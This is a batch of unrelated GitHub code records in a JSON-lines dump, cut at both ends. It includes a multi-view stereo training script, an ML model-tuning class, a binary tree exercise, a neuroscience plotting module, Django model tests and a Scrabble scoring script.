data_batch in enumerate(data_loader):\n data_time = time.time() - end\n curr_ref_img_path = data_batch[\"ref_img_path\"]\n\n data_batch = {k: v.cuda(non_blocking=True) for k, v in data_batch.items() if isinstance(v, torch.Tensor)}\n\n preds = model(data_batch, image_scales, inter_scales, isFlow)\n loss_dict = loss_fn(preds, data_batch, isFlow)\n metric_dict = metric_fn(preds, data_batch, isFlow)\n losses = sum(loss_dict.values())\n meters.update(loss=losses, **loss_dict, **metric_dict)\n batch_time = time.time() - end\n end = time.time()\n meters.update(time=batch_time, data=data_time)\n\n if iteration % log_period == 0:\n logger.info(\n meters.delimiter.join(\n [\n \"EPOCH: {epoch:2d}\",\n \"iter: {iter:4d}\",\n \"{meters}\",\n ]\n ).format(\n epoch=curr_epoch,\n iter=iteration,\n meters=str(meters),\n )\n )\n tensorboard_logger.add_scalars(meters.meters, curr_epoch * total_iteration + iteration, prefix=\"valid\")\n\n if iteration % (100 * log_period) == 0:\n file_logger(data_batch, preds, curr_epoch * total_iteration + iteration, output_dir, prefix=\"valid\")\n\n return meters\n\n\ndef train(cfg, output_dir=\"\"):\n logger = logging.getLogger(\"pointmvsnet.trainer\")\n\n # build model\n set_random_seed(cfg.RNG_SEED)\n model, loss_fn, metric_fn = build_model(cfg)\n logger.info(\"Build model:\\n{}\".format(str(model)))\n model = nn.DataParallel(model).cuda()\n\n # build optimizer\n optimizer = build_optimizer(cfg, model)\n\n # build lr scheduler\n scheduler = build_scheduler(cfg, optimizer)\n\n # build checkpointer\n checkpointer = Checkpointer(model,\n optimizer=optimizer,\n scheduler=scheduler,\n save_dir=output_dir,\n logger=logger)\n\n checkpoint_data = checkpointer.load(cfg.MODEL.WEIGHT, resume=cfg.AUTO_RESUME)\n ckpt_period = cfg.TRAIN.CHECKPOINT_PERIOD\n\n # build data loader\n train_data_loader = build_data_loader(cfg, mode=\"train\")\n val_period = cfg.TRAIN.VAL_PERIOD\n val_data_loader = build_data_loader(cfg, mode=\"val\") if val_period > 0 else None\n\n # build tensorboard logger (optionally by comment)\n tensorboard_logger = TensorboardLogger(output_dir)\n\n # train\n max_epoch = cfg.SCHEDULER.MAX_EPOCH\n start_epoch = checkpoint_data.get(\"epoch\", 0)\n best_metric_name = \"best_{}\".format(cfg.TRAIN.VAL_METRIC)\n best_metric = checkpoint_data.get(best_metric_name, None)\n logger.info(\"Start training from epoch {}\".format(start_epoch))\n for epoch in range(start_epoch, max_epoch):\n cur_epoch = epoch + 1\n scheduler.step()\n start_time = time.time()\n train_meters = train_model(model,\n loss_fn,\n metric_fn,\n image_scales=cfg.MODEL.TRAIN.IMG_SCALES,\n inter_scales=cfg.MODEL.TRAIN.INTER_SCALES,\n isFlow=(cur_epoch > cfg.SCHEDULER.INIT_EPOCH),\n data_loader=train_data_loader,\n optimizer=optimizer,\n curr_epoch=epoch,\n tensorboard_logger=tensorboard_logger,\n log_period=cfg.TRAIN.LOG_PERIOD,\n output_dir=output_dir,\n )\n epoch_time = time.time() - start_time\n logger.info(\"Epoch[{}]-Train {} total_time: {:.2f}s\".format(\n cur_epoch, train_meters.summary_str, epoch_time))\n\n # checkpoint\n if cur_epoch % ckpt_period == 0 or cur_epoch == max_epoch:\n checkpoint_data[\"epoch\"] = cur_epoch\n checkpoint_data[best_metric_name] = best_metric\n checkpointer.save(\"model_{:03d}\".format(cur_epoch), **checkpoint_data)\n\n # validate\n if val_period < 1:\n continue\n if cur_epoch % val_period == 0 or cur_epoch == max_epoch:\n val_meters = validate_model(model,\n loss_fn,\n metric_fn,\n image_scales=cfg.MODEL.VAL.IMG_SCALES,\n inter_scales=cfg.MODEL.VAL.INTER_SCALES,\n isFlow=(cur_epoch > cfg.SCHEDULER.INIT_EPOCH),\n data_loader=val_data_loader,\n curr_epoch=epoch,\n tensorboard_logger=tensorboard_logger,\n log_period=cfg.TEST.LOG_PERIOD,\n output_dir=output_dir,\n )\n logger.info(\"Epoch[{}]-Val {}\".format(cur_epoch, val_meters.summary_str))\n\n # best validation\n cur_metric = val_meters.meters[cfg.TRAIN.VAL_METRIC].global_avg\n if best_metric is None or cur_metric > best_metric:\n best_metric = cur_metric\n checkpoint_data[\"epoch\"] = cur_epoch\n checkpoint_data[best_metric_name] = best_metric\n checkpointer.save(\"model_best\", **checkpoint_data)\n\n logger.info(\"Best val-{} = {}\".format(cfg.TRAIN.VAL_METRIC, best_metric))\n\n return model\n\n\ndef main():\n args = parse_args()\n num_gpus = torch.cuda.device_count()\n\n cfg = load_cfg_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n\n output_dir = cfg.OUTPUT_DIR\n if output_dir:\n config_path = osp.splitext(args.config_file)[0]\n config_path = config_path.replace(\"configs\", \"outputs\")\n output_dir = output_dir.replace('@', config_path)\n mkdir(output_dir)\n\n logger = setup_logger(\"pointmvsnet\", output_dir, prefix=\"train\")\n logger.info(\"Using {} GPUs\".format(num_gpus))\n logger.info(args)\n\n logger.info(\"Loaded configuration file {}\".format(args.config_file))\n logger.info(\"Running with config:\\n{}\".format(cfg))\n\n train(cfg, output_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"callmeray/PointMVSNet","sub_path":"pointmvsnet/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10906,"program_lang":"python","lang":"en","doc_type":"code","stars":470,"dataset":"github-code","pt":"34"} +{"seq_id":"11514561895","text":"from sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\nfrom xgboost import XGBRegressor\n\nfrom mlflow_operations import MLFlow_Operation\nfrom utils.logger import App_Logger\nfrom utils.model_utils import Model_Utils\nfrom utils.read_params import read_params\n\n\nclass Model_Finder:\n \"\"\"\n Description : This class shall be used to find the model with best accuracy and AUC score.\n \n Version : 1.2\n Revisions : Moved to setup to cloud \n \"\"\"\n\n def __init__(self, log_file):\n self.log_file = log_file\n\n self.class_name = self.__class__.__name__\n\n self.config = read_params()\n\n self.split_kwargs = self.config[\"base\"]\n\n self.mlflow_op = MLFlow_Operation(self.log_file)\n\n self.model_utils = Model_Utils()\n\n self.log_writer = App_Logger()\n\n self.rf_model = RandomForestRegressor()\n\n self.xgb_model = XGBRegressor()\n\n self.dt_model = DecisionTreeRegressor()\n\n def get_rf_model(self, train_x, train_y):\n \"\"\"\n Method Name : get_rf_model\n Description : get the parameters for Random Forest Algorithm which give the least r2 score\n Use Hyper Parameter Tuning.\n \n Output : The model with the best parameters\n On Failure : Write an exception log and then raise an exception\n \n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.get_rf_model.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, self.log_file)\n\n try:\n self.rf_model_name = self.rf_model.__class__.__name__\n\n self.rf_best_params = self.model_utils.get_model_params(\n self.rf_model, train_x, train_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.rf_model_name} model best params are {self.rf_best_params}\",\n self.log_file,\n )\n\n self.rf_model.set_params(**self.rf_best_params)\n\n self.log_writer.log(\n f\"Initialized {self.rf_model_name} with {self.rf_best_params} as params\",\n self.log_file,\n )\n\n self.rf_model.fit(train_x, train_y)\n\n self.log_writer.log(\n f\"Created {self.rf_model_name} based on the {self.rf_best_params} as params\",\n self.log_file,\n )\n\n self.log_writer.start_log(\n \"exit\", self.class_name, method_name, self.log_file\n )\n\n return self.rf_model\n\n except Exception as e:\n self.log_writer.exception_log(\n e, self.class_name, method_name, self.log_file\n )\n\n def get_xgboost_model(self, train_x, train_y):\n \"\"\"\n Method Name : get_xgboost_model\n Description : get the parameters for XGBoost Algorithm which give the least r2 score\n Use Hyper Parameter Tuning.\n\n Output : The model with the best parameters\n On Failure : Write an exception log and then raise an exception\n\n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.get_xgboost_model.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, self.log_file)\n\n try:\n self.xgb_model_name = self.xgb_model.__class__.__name__\n\n self.xgb_best_params = self.model_utils.get_model_params(\n self.xgb_model, train_x, train_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.xgb_model_name} model best params are {self.xgb_best_params}\",\n self.log_file,\n )\n\n self.xgb_model.set_params(**self.xgb_best_params)\n\n self.log_writer.log(\n f\"Initialized {self.xgb_model_name} model with best params as {self.xgb_best_params}\",\n self.log_file,\n )\n\n self.xgb_model.fit(train_x, train_y)\n\n self.log_writer.log(\n f\"Created {self.xgb_model_name} model with best params as {self.xgb_best_params}\",\n self.log_file,\n )\n\n self.log_writer.start_log(\n \"exit\", self.class_name, method_name, self.log_file\n )\n\n return self.xgb_model\n\n except Exception as e:\n self.log_writer.exception_log(\n e, self.class_name, method_name, self.log_file\n )\n\n def get_decision_tree_model(self, train_x, train_y, test_x, test_y):\n \"\"\"\n Method Name : get_decision_tree_model\n Description : get the parameters for XGBoost Algorithm which give the least r2 score.\n \n Output : The best model name and the model object\n On Failure : Write an exception log and then raise an exception\n\n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.get_decision_tree_model.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, self.log_file)\n try:\n self.dt_model_name = self.xgb_model.__class__.__name__\n\n self.dt_best_params = self.model_utils.get_model_params(\n self.dt_model, train_x, train_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.dt_model_name} model best params are {self.dt_best_params}\",\n self.log_file,\n )\n\n self.dt_model.set_params(**self.dt_best_params)\n\n self.log_writer.log(\n f\"Initialized {self.xgb_model_name} model with best params as {self.dt_best_params}\",\n self.log_file,\n )\n\n self.dt_model.fit(train_x, train_y)\n\n self.log_writer.log(\n f\"Created {self.xgb_model_name} model with best params as {self.dt_best_params}\",\n self.log_file,\n )\n\n self.log_writer.start_log(\n \"exit\", self.class_name, method_name, self.log_file\n )\n\n return self.dt_model\n\n except Exception as e:\n raise e\n\n def get_trained_models(self, train_x, train_y, test_x, test_y):\n \"\"\"\n Method Name : get_trained_models\n Description : Find out the Model which has the best score.\n \n Output : The best model name and the model object\n On Failure : Write an exception log and then raise an exception\n\n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.get_trained_models.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, self.log_file)\n\n try:\n self.xgb_model = self.get_xgboost_model(train_x, train_y)\n\n self.log_writer.log(\n f\"Got trained {self.xgb_model.__class__.__name__} model\", self.log_file\n )\n\n self.xgb_model_score = self.model_utils.get_model_score(\n self.xgb_model, test_x, test_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.xgb_model.__class__.__name__} model score is {self.xgb_model_score}\",\n self.log_file,\n )\n\n self.rf_model = self.get_rf_model(train_x, train_y)\n\n self.log_writer.log(\n f\"Got trained {self.rf_model.__class__.__name__} model\", self.log_file\n )\n\n self.rf_model_score = self.model_utils.get_model_score(\n self.rf_model, test_x, test_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.rf_model.__class__.__name__} model score is {self.rf_model_score}\",\n self.log_file,\n )\n\n self.dt_model = self.get_decision_tree_model(train_x, train_y)\n\n self.log_writer.log(\n f\"Got trained {self.dt_model.__class__.__name__} model\", self.log_file\n )\n\n self.dt_model_score = self.model_utils.get_model_score(\n self.dt_model, test_x, test_y, self.log_file\n )\n\n self.log_writer.log(\n f\"{self.dt_model.__class__.__name__} model score is {self.dt_model_score}\",\n self.log_file,\n )\n\n lst = [\n (self.xgb_model, self.xgb_model_score),\n (self.rf_model, self.rf_model_score),\n (self.dt_model, self.dt_model_score),\n ]\n\n self.log_writer.log(\n \"Got list of tuples consisting of trained models and model scores\",\n self.log_file,\n )\n\n self.log_writer.start_log(\n \"exit\", self.class_name, method_name, self.log_file\n )\n\n return lst\n\n except Exception as e:\n self.log_writer.exception_log(\n e, self.class_name, method_name, self.log_file\n )\n\n def train_and_log_models(self, X_data, Y_data, log_file, idx):\n \"\"\"\n Method Name : train_and_log_models\n Description : The methods gets the trained models and performs logging of models,parameters and metrics to mlflow server \n \n Output : The trained models along with thier parameters and metrics are logged into mlflow server and artifacts are stored\n blob container \n On Failure : Write an exception log and then raise an exception\n\n Version : 1.2\n Revisions : moved setup to cloud\n \"\"\"\n method_name = self.train_and_log_models.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, log_file)\n\n try:\n x_train, x_test, y_train, y_test = train_test_split(\n X_data, Y_data, **self.split_kwargs\n )\n\n self.log_writer.log(\n f\"Performed train test split with kwargs as {self.split_kwargs}\",\n log_file,\n )\n\n lst = self.get_trained_models(x_train, y_train, x_test, y_test)\n\n self.log_writer.log(\n f\"Got trained models for {idx} cluster number\", log_file\n )\n\n self.mlflow_op.save_and_log_models(lst, idx)\n\n self.log_writer.log(\n \"Saved and logged all trained models to mlflow\", log_file\n )\n\n self.log_writer.start_log(\"exit\", self.class_name, method_name, log_file)\n\n except Exception as e:\n self.log_writer.exception_log(e, self.class_name, method_name, log_file)\n","repo_name":"sethusaim/Visibility-Climate-Kubernetes-Azure","sub_path":"model_training/tuner.py","file_name":"tuner.py","file_ext":"py","file_size_in_byte":10754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25033264493","text":"from collections import deque\n\n\nclass Node:\n def __init__(self,data):\n self.data = data\n self.right = None\n self.left = None\n \n def insert(self,data):\n root=self\n if root:\n if dataroot.data:\n #right\n if root.right:\n root.right.insert(data)\n else:\n root.right = Node(data)\n\n \n def PrintTree(self):\n if self.left:\n self.left.PrintTree()\n print( self.data),\n if self.right:\n self.right.PrintTree()\n\n\n\n\n\n#-------------NextRight---------------\ndef NextRight(root,key):\n qu = deque([])\n qu.append(root)\n while len(qu)!=0:\n flag=0\n for i in range(len(qu)):\n node = qu.popleft()\n if flag==1:\n return node.data\n if node.data==key:\n flag=1\n if node.left:\n qu.append(node.left)\n if node.right:\n qu.append(node.right)\n if flag==1:\n return -1\n\n\n\n\n\n\n\n\n\n\n# 4\n# 1 5\n# 2 6\n# 1.5 3 7\n# 2.5 \n\n\n\nroot = Node(4)\nroot.insert(1)\nroot.insert(2)\nroot.insert(1.5)\nroot.insert(3)\nroot.insert(5)\nroot.insert(6)\nroot.insert(7)\nroot.insert(2.5)\n\nkey = 2\nprint(NextRight(root,key))","repo_name":"abhinav215/DsAlgo","sub_path":"StriverTree/Extra/NextRight.py","file_name":"NextRight.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14425324814","text":"\"\"\"Plots for spatial measures and analyses.\"\"\"\n\nfrom copy import deepcopy\nfrom itertools import repeat\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom spiketools.utils.base import (listify, combine_dicts, relabel_keys,\n drop_key_prefix, subset_dict)\nfrom spiketools.utils.checks import check_array_lst_orientation\nfrom spiketools.utils.data import make_row_orientation, smooth_data, compute_range\nfrom spiketools.modutils.functions import get_function_parameters\nfrom spiketools.plts.annotate import add_dots, add_gridlines\nfrom spiketools.plts.settings import DEFAULT_COLORS\nfrom spiketools.plts.utils import check_ax, make_axes, savefig\nfrom spiketools.plts.style import set_plt_kwargs, invert_axes\n\n###################################################################################################\n###################################################################################################\n\n@savefig\n@set_plt_kwargs\ndef plot_positions(position, spike_positions=None, landmarks=None, x_bins=None,\n y_bins=None, invert=None, ax=None, **plt_kwargs):\n \"\"\"Plot positions.\n\n Parameters\n ----------\n position : 2d array or list of 2d array\n Position data.\n If a list, each array from the list is plotted separately, on the same plot.\n spike_positions : 2d array or dict, optional\n Position values of spikes, to indicate on the plot.\n If array, defines the positions.\n If dictionary, should include a 'positions' key plus additional plot arguments.\n landmarks : 1d or 2d array or dict or list, optional\n Position values of landmarks, to be added to the plot.\n If array, defines the positions, as [x, y] for a single landmark 1d array,\n or as [[x-pos], [y-pos]] for a 2d definition of multiple landmarks.\n If dictionary, should include a 'positions' key with an array plus additional arguments.\n Multiple landmarks can be added by passing a list of arrays or a list of dictionaries.\n x_bins, y_bins : list of float, optional\n Bin edges for each axis.\n If provided, these are used to draw grid lines on the plot.\n invert : {'x', 'y', 'both'}, optional\n If provided, inverts the plot axes over x, y or both axes.\n Note that invert x is equivalent to flipping the data left/right, and y to flipping up/down.\n ax : Axes, optional\n Axis object upon which to plot.\n plt_kwargs\n Additional arguments to pass into the plot function.\n \"\"\"\n\n ax = check_ax(ax, figsize=plt_kwargs.pop('figsize', None))\n\n orientation = check_array_lst_orientation(listify(position))\n for cur_position in listify(position):\n ax.plot(*make_row_orientation(cur_position, orientation),\n color=plt_kwargs.pop('color', DEFAULT_COLORS[0]),\n alpha=plt_kwargs.pop('alpha', 0.35),\n **plt_kwargs)\n\n if spike_positions is not None:\n defaults = {'color' : 'red', 'alpha' : 0.4, 'ms' : 6}\n if isinstance(spike_positions, np.ndarray):\n add_dots(make_row_orientation(spike_positions, orientation),\n ax=ax, **defaults)\n elif isinstance(spike_positions, dict):\n add_dots(make_row_orientation(spike_positions.pop('positions'), orientation),\n ax=ax, **{**defaults, **spike_positions})\n\n if landmarks is not None:\n defaults = {'alpha' : 0.85, 'ms' : 12}\n for landmark in [landmarks] if not isinstance(landmarks, list) else landmarks:\n if isinstance(landmark, np.ndarray):\n add_dots(make_row_orientation(landmark, orientation),\n ax=ax, **defaults)\n elif isinstance(landmark, dict):\n add_dots(make_row_orientation(landmark.pop('positions'), orientation),\n ax=ax, **landmark)\n\n add_gridlines(x_bins, y_bins, ax)\n invert_axes(invert, ax)\n\n\n@savefig\n@set_plt_kwargs\ndef plot_position_1d(position, events=None, colors=None, sizes=None, ax=None, **plt_kwargs):\n \"\"\"Position 1d position data, with annotated events.\n\n Parameters\n ----------\n position : 1d array\n Position data.\n events : 1d array or dict or list\n Events to add to the plot, as vertical lines.\n If array, defines the position(s) of each event.\n If dictionary, should include a 'positions' key with an array plus additional arguments.\n Multiple event definitions can be passed in as a list of dictionaries or arrays.\n colors : str or list of str\n Color(s) for each event.\n Only used if `events` are passed in as an array or list of arrays.\n sizes : float or list of float\n Size(s) for each event.\n Only used if `events` are passed in as an array or list of arrays.\n ax : Axes, optional\n Axis object upon which to plot.\n plt_kwargs\n Additional arguments to pass into the plot function.\n Custom kwargs: 'position_color', 'position_alpha', 'position_linewidth'.\n \"\"\"\n\n ax = check_ax(ax, figsize=plt_kwargs.pop('figsize', None))\n\n if position is not None:\n\n position_plt_kwargs = drop_key_prefix(subset_dict(plt_kwargs, 'position'), 'position')\n ax.plot(position, [1] * len(position), **position_plt_kwargs)\n\n colors = iter(listify(colors)) if colors else iter(DEFAULT_COLORS[1:])\n sizes = iter(listify(sizes)) if sizes else repeat(1)\n\n events = [events] if isinstance(events, (dict, np.ndarray)) else events\n for event in events:\n\n if isinstance(event, np.ndarray):\n ax.eventplot(event, color=next(colors), linelengths=next(sizes), **plt_kwargs)\n elif isinstance(event, dict):\n ax.eventplot(**relabel_keys(event, {'size' : 'linelengths'}), **plt_kwargs)\n\n ax.set(xlabel='Position', yticks=[])\n\n\n@savefig\n@set_plt_kwargs\ndef plot_position_by_time(timestamps, position, spikes=None, spike_positions=None,\n event_times=None, event_positions=None, event_kwargs=None,\n time_bins=None, position_bins=None, invert=None,\n ax=None, **plt_kwargs):\n \"\"\"Plot the position across time for a single dimension.\n\n Parameters\n ----------\n timestamps : 1d array\n Timestamps, in seconds, corresponding to the position values.\n position : 1d array\n Position values, for a single dimension.\n spikes : 1d array, optional\n Spike times, in seconds.\n spike_positions : 1d array, optional\n Position values of spikes, to indicate on the plot.\n event_times : 1d array, optional\n Time values of event markers to add to the plot.\n If provided, `event_positions` must also be provided.\n event_positions : 1d array, optional\n Position values of event markers to add to the plot\n If provided, `event_times` must also be provided.\n event_kwargs : dict, optional\n Keyword arguments for styling the events to be added to the plot.\n time_bins : list of float, optional\n Bin edges for the time axis.\n If provided, these are used to draw vertical grid lines on the plot.\n position_bins : list of float, optional\n Bin edges for the position axis.\n If provided, these are used to draw horizontal grid lines on the plot.\n invert : {'x', 'y', 'both'}, optional\n If provided, inverts the plot axes over x, y or both axes.\n Note that invert x is equivalent to flipping the data left/right, and y to flipping up/down.\n ax : Axes, optional\n Axis object upon which to plot.\n plt_kwargs\n Additional arguments to pass into the plot function.\n \"\"\"\n\n ax = check_ax(ax, figsize=plt_kwargs.pop('figsize', None))\n\n spike_positions_plot = None\n if spikes is not None:\n spike_positions_plot = np.array([spikes, spike_positions])\n\n event_defaults = {'alpha' : 0.85, 'ms' : 10}\n landmarks = {'positions' : np.array([event_times, event_positions]),\n **combine_dicts([event_defaults, {} if not event_kwargs else event_kwargs])}\n\n plot_positions(np.array([timestamps, position]), spike_positions_plot,\n landmarks=landmarks, x_bins=time_bins, y_bins=position_bins,\n invert=invert, ax=ax, **plt_kwargs)\n\n ax.set(xlabel='Time', ylabel='Position')\n\n\n@savefig\n@set_plt_kwargs\ndef plot_heatmap(data, smooth=False, smoothing_kernel=1.5, ignore_zero=False,\n cbar=False, cmap=None, vmin=None, vmax=None,\n transpose=False, invert=None, ax=None, **plt_kwargs):\n \"\"\"Plot a spatial heat map.\n\n Parameters\n ----------\n data : 2d array\n Measure to plot across a grided environment.\n smooth : bool, optional, default: False\n Whether to smooth the data before plotting.\n smoothing_kernel : float, optional, default: 1.5\n Standard deviation of the gaussian kernel to apply for smoothing.\n ignore_zero : bool, optional, default: False\n If True, replaces 0's with NaN for plotting.\n cbar : bool, optional, default: False\n Whether to add a colorbar to the plot.\n cmap : str, optional\n Which colormap to use to plot.\n vmin, vmax : float, optional\n Min and max plot ranges.\n transpose : bool, optional, default: False\n Whether to transpose the data before plotting.\n invert : {'x', 'y', 'both'}, optional\n If provided, inverts the plot axes over x, y or both axes.\n Note that invert x is equivalent to flipping the data left/right, and y to flipping up/down.\n ax : Axes, optional\n Axis object upon which to plot.\n plt_kwargs\n Additional arguments to pass into the plot function.\n\n Notes\n -----\n This function uses `plt.imshow` to visualize the matrix.\n Note that in doing so, it defaults to settings the origin to 'lower'.\n This setting can be overwritten by passing in a value for `origin`.\n \"\"\"\n\n ax = check_ax(ax, figsize=plt_kwargs.pop('figsize', None))\n\n if data.ndim < 2:\n data = np.atleast_2d(data)\n\n if transpose:\n data = data.T\n\n if smooth:\n data = smooth_data(data, smoothing_kernel)\n\n if ignore_zero:\n data = deepcopy(data)\n data[data == 0.] = np.nan\n\n im = ax.imshow(data, cmap=cmap, vmin=vmin, vmax=vmax,\n origin=plt_kwargs.pop('origin', 'lower'),\n **plt_kwargs)\n\n ax.set(xticks=[], yticks=[])\n ax.set_axis_off()\n\n if cbar:\n colorbar = plt.colorbar(im)\n colorbar.outline.set_visible(False)\n\n invert_axes(invert, ax)\n\n\n@savefig\ndef plot_trial_heatmaps(trial_data, **plt_kwargs):\n \"\"\"Plot spatial heat maps for a set of trials.\n\n Parameters\n ----------\n trial_data : 3d array\n Spatially binned spike activity, per trial, with shape of [n_trials, n_xbins, n_ybins].\n plt_kwargs\n Additional arguments to pass into the plot function.\n This can include arguments into `make_axes`, which initializes the set of axes.\n \"\"\"\n\n axis_kwargs = {key : plt_kwargs.pop(key) \\\n for key in get_function_parameters(make_axes).keys() if key in plt_kwargs}\n axes = make_axes(trial_data.shape[0], **axis_kwargs)\n for data, ax in zip(trial_data, axes):\n plot_heatmap(data, **plt_kwargs, ax=ax)\n\n\ndef create_heat_title(label, data, stat=None, p_val=None):\n \"\"\"Create a standardized title for an heatmap, listing the data range.\n\n Parameters\n ----------\n label : str\n Label to add to the beginning of the title.\n data : 2d array\n The array of data that is plotted, used to compute the data range.\n stat, p_val : float, optional\n A statistical test value and p statistic to report related to the heatmap.\n\n Returns\n -------\n title : str\n Title for the plot.\n \"\"\"\n\n template = '({:1.2f}-{:1.2f})' if 'float' in str(data.dtype) else '({:d}-{:d})'\n if stat is None:\n title = ('{} - ' + template).format(label, *compute_range(data))\n else:\n title = ('{} - ' + template + '\\n stat: {:1.2f}, p: {:1.2f}').format(\\\n label, *compute_range(data), stat, p_val)\n\n return title\n","repo_name":"spiketools/spiketools","sub_path":"spiketools/plts/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":12207,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"34"} +{"seq_id":"32043681474","text":"__author__ = 'dooferlad'\n\nimport datetime\nimport hashlib\nimport unittest\n\nfrom django.test import TestCase\n\nfrom license_protected_downloads.models import (\n APIKeyStore,\n APIToken,\n License,\n)\n\n\nclass LicenseTestCase(TestCase):\n def setUp(self):\n lic1_text = 'Samsung License'\n lic2_text = 'Stericsson License'\n lic3_text = 'Linaro License'\n digest1 = hashlib.md5(lic1_text).hexdigest()\n digest2 = hashlib.md5(lic2_text).hexdigest()\n digest3 = hashlib.md5(lic2_text).hexdigest()\n self.lic1 = License.objects.create(\n digest=digest1, text=lic1_text, theme='samsung')\n self.lic2 = License.objects.create(\n digest=digest2, text=lic2_text, theme='stericsson')\n self.lic3 = License.objects.create(\n digest=digest3, text=lic3_text, theme='linaro')\n\n def test_add_license_to_database(self):\n self.assertEquals(self.lic1.theme, 'samsung')\n self.assertEquals(self.lic2.theme, 'stericsson')\n self.assertEquals(self.lic3.theme, 'linaro')\n\n lic1 = License.objects.get(pk=1)\n self.assertEquals(lic1.theme, 'samsung')\n self.assertEquals(lic1.text, 'Samsung License')\n lic2 = License.objects.get(pk=2)\n self.assertEquals(lic2.theme, 'stericsson')\n self.assertEquals(lic2.text, 'Stericsson License')\n lic3 = License.objects.get(pk=3)\n self.assertEquals(lic3.theme, 'linaro')\n self.assertEquals(lic3.text, 'Linaro License')\n\n\nclass APITokenTests(TestCase):\n def setUp(self):\n self.key = APIKeyStore.objects.create(key='foo')\n self.request = None\n\n def test_no_expire(self):\n token = APIToken.objects.create(key=self.key)\n self.assertTrue(token.valid_request(self.request))\n\n expires = datetime.datetime.now() + datetime.timedelta(minutes=1)\n token = APIToken.objects.create(key=self.key, expires=expires)\n self.assertTrue(token.valid_request(self.request))\n\n def test_expired(self):\n expires = datetime.datetime.now() - datetime.timedelta(seconds=1)\n token = APIToken.objects.create(key=self.key, expires=expires)\n self.assertFalse(token.valid_request(self.request))\n self.assertTrue(len(token.token) > 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NexellCorp/infrastructure_server_linaro-license-protection","sub_path":"license_protected_downloads/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28352189095","text":"letters = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\",\n \"W\", \"X\", \"Y\", \"Z\"]\npoints = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 4, 1, 3, 10, 1, 1, 1, 1, 4, 4, 8, 4, 10]\n\nletters_to_points = {key: value for key, value in zip(letters, points)}\nletters_to_points[\" \"] = 0\n\n\ndef score_word(word):\n print_total = 0\n for letter in word:\n print_total += letters_to_points.get(letter, 0)\n return print_total\n\n\nplayer_to_words = {\"player1\": [\"BLUE\", \"TENNIS\", \"EXIT\"], \"wordNerd\": [\"EARTH\", \"EYES\", \"MACHINE\"],\n \"Lexi Con\": [\"ERASER\", \"BELLY\", \"HUSKY\"], \"Prof Reader\": [\"ZAP\", \"COMA\", \"PERIOD\"]}\n\nplayer_to_points = {}\n\n\ndef update_point_total(player, words):\n for player, words in player_to_words.items():\n player_points = 0\n for word in words:\n player_points += score_word(word)\n player_to_points[player] = player_points\n print(player_to_points)\n\n\ndef play_word(player, words):\n player_to_words[player].append(words)\n\n\nletters += [letter.lower() for letter in letters]\npoints *= 2","repo_name":"TMahen21/Codes","sub_path":"Scrabble Project.py","file_name":"Scrabble Project.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41325227883","text":"#!/usr/bin/env python\nimport scipy.interpolate\nimport h5py\nimport pandas as pd\nimport os\nimport pickle\n#import dill as pickle\n\n#import dakota.interfacing as di\n#params, results = di.read_parameters_file(parameters_file='sfr_moo.in', results_file='sfr_moo.out')\n\n###Hard Coded In Values - need to fix\n\n#params = {'height': (50, 70), 'smear': (50, 70)}\n#results = ['keff', 'void_coeff', 'doppler_coeff']\n\ndb = h5py.File('test_db.h5', 'r+')\nreactorDict = {}\nfor r in db.keys():\n reactor = db[r]\n labels = [attr for attr in reactor.attrs]\n attrs = [reactor.attrs[attr] for attr in reactor.attrs]\n dataDict = dict(zip(labels, attrs))\n reactorDict[r] = dataDict\n\nreactorData = pd.DataFrame(reactorDict)\nreactorData = reactorData.T\n# Convert stored bytes back to strings\nreactorData['enrichment'] = reactorData['enrichment'].apply(lambda x : x.decode(\"utf-8\"))\nreactorData['condition'] = reactorData['condition'].apply(lambda x : x.decode(\"utf-8\"))\n\nreactorData.to_pickle(\"./sfr_Data.pkl\")\n\n# Create a a coordinate system via the variables for interpolator\n#var_array = []\n#for k, v in params.items():\n# var_list = []\n# for data_point in reactorData[k]:\n# var_list.append(data_point)\n# var_array.append(var_list)\n#coordinates = list(zip(*var_array))\n# \n## Create a list of objectives to solve for, and a list of known values\n## for the objectives \n#obj_dict = {}\n#interp = {}\n#for obj in results:\n# obj_list = []\n# for data_point in reactorData[obj]:\n# try:\n# obj_list.append(data_point[0])\n# except IndexError:\n# obj_list.append(data_point)\n# obj_dict[obj] = obj_list\n# \n## Create a dictionary of the objective function and the interpolator,\n## 